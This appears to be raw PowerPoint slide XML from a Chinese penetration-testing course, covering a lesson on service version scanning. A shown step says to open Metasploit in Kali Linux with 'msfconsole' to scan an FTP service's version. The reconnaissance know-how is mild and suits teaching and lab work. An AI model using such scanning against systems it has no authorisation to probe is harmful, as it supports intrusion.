            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行FTP服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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25" name="矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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26" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351780" y="691515"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令，打开Metasploit框架，如图2-4-11所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351780" y="1336675"/>
            <a:ext cx="5276850" cy="4991100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351780" y="6327775"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-11 打开Metasploit框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行FTP服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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25" name="矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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26" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567680" y="805180"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
